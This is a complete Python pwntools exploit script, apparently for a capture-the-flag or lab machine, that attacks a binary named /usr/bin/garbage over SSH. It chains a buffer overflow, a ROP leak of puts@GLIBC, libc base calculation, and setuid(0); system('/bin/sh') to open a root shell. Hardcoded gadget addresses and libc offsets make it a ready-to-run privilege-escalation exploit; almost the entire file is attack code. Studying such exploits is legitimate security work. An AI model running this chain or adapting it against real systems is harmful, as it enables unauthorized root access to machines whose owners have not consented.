import os
import struct

from pwn import *
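# Two-stage ret2libc against /usr/bin/garbage, driven over SSH with pwntools.
#
# Stage 1 overflows the input buffer, leaks puts@GLIBC via puts(puts@got) and
# returns into main() for a second overflow.  Stage 2 uses the leaked pointer to
# compute the libc base and runs setuid(0); system("/bin/sh").
#
# Credentials come from the environment so they are never committed alongside
# the exploit; unset variables fall back to the empty placeholders the script
# originally shipped with.
HOST = os.environ.get("GARBAGE_HOST", "")
USER = os.environ.get("GARBAGE_USER", "")
PASS = os.environ.get("GARBAGE_PASS", "")

# Binary-side addresses.  The target is not PIE, so these are fixed.
PLT_MAIN = 0x401619   # main(): returning here gives us a second overflow
PLT_PUTS = 0x401050   # puts@plt
GOT_PUTS = 0x404028   # puts@got, read by stage 1
POP_RDI = 0x40179b    # "pop rdi ; ret" gadget
JUNK_LEN = 136        # bytes from the start of the buffer to the saved return address

# libc-side offsets.  These are only valid for the exact libc build on the
# target; a different build breaks the exploit (the leak check below catches
# the most obvious mismatch).
LIBC_PUTS = 0x809c0
LIBC_SYSTEM = 0x4f440
LIBC_BINSH = 0x1b3e9a   # "/bin/sh" string
LIBC_SETUID = 0xe5970


def _q(value):
    """Pack *value* as a little-endian 64-bit word.

    Equivalent to pwntools' ``p64`` under ``arch="amd64"``; kept on ``struct`` so
    the chain builders have no pwntools dependency and can be unit-tested.
    """
    return struct.pack("<Q", value)


def build_leak_chain():
    """Return the stage-1 payload: puts(puts@got), then return into main().

    Returns:
        bytes: JUNK_LEN filler followed by the ROP chain.
    """
    return (b"A" * JUNK_LEN
            + _q(POP_RDI) + _q(GOT_PUTS)   # rdi = &puts@got
            + _q(PLT_PUTS)                 # puts(&puts@got) -> prints the pointer
            + _q(PLT_MAIN))                # back into main() for the second overflow


def parse_leak(raw):
    """Recover the puts@GLIBC pointer from what the target printed after "denied.".

    Keeps the original heuristic: take the first 8 bytes, strip the surrounding
    newline(s), and zero-pad back to 8.  This only works because neither end of
    the 6 significant pointer bytes is ASCII whitespace for this libc (puts
    ends in 0xc0, the top byte is 0x7f) - it is not a general-purpose parser,
    and the exact framing of the target's output is assumed, not verified here.

    Args:
        raw: bytes received from the target right after "denied.".

    Returns:
        int: the leaked address of puts inside libc.

    Raises:
        ValueError: if the parsed value cannot be a puts address.
    """
    leaked = struct.unpack("<Q", raw[:8].strip().ljust(8, b"\x00"))[0]
    # libc is mapped page-aligned, so the low 12 bits of the leaked pointer must
    # equal the low 12 bits of puts' offset inside libc.  Anything else means the
    # leak was mis-parsed (or the target runs a different libc) and stage 2 would
    # be built on a bogus base - fail loudly instead of crashing the target.
    if leaked & 0xfff != LIBC_PUTS & 0xfff:
        raise ValueError("leaked value %#x does not look like puts@GLIBC" % leaked)
    return leaked


def build_shell_chain(libc_base):
    """Return the stage-2 payload: setuid(0); system("/bin/sh").

    Args:
        libc_base: address libc is loaded at (leaked puts minus LIBC_PUTS).

    Returns:
        bytes: JUNK_LEN filler followed by the ROP chain.

    NOTE(review): there is no extra ``ret`` gadget for 16-byte stack alignment
    before system(); if system() ever faults on a ``movaps``, insert one before
    the second POP_RDI.  The original chain worked without it on the target.
    """
    return (b"A" * JUNK_LEN
            + _q(POP_RDI) + _q(0) + _q(libc_base + LIBC_SETUID)                      # setuid(0)
            + _q(POP_RDI) + _q(libc_base + LIBC_BINSH) + _q(libc_base + LIBC_SYSTEM))  # system("/bin/sh")


def main():
    """Run both stages against the remote binary and drop into an interactive shell."""
    context(os="linux", arch="amd64")
    s = ssh(host=HOST, user=USER, password=PASS)
    try:
        p = s.process("/usr/bin/garbage")

        # Stage 1: leak puts@GLIBC.
        p.sendline(build_leak_chain())
        p.recvuntil(b"denied.")
        leaked_puts = parse_leak(p.recv())
        log.success("Leaked puts@GLIBC: %#x" % leaked_puts)
        libc_base = leaked_puts - LIBC_PUTS

        # Stage 2: setuid(0); system("/bin/sh") against the re-entered main().
        p.sendline(build_shell_chain(libc_base))
        p.recvuntil(b"denied.")
        p.interactive()
    finally:
        # Always tear down the SSH session, even if the leak check bails out.
        s.close()


if __name__ == "__main__":
    main()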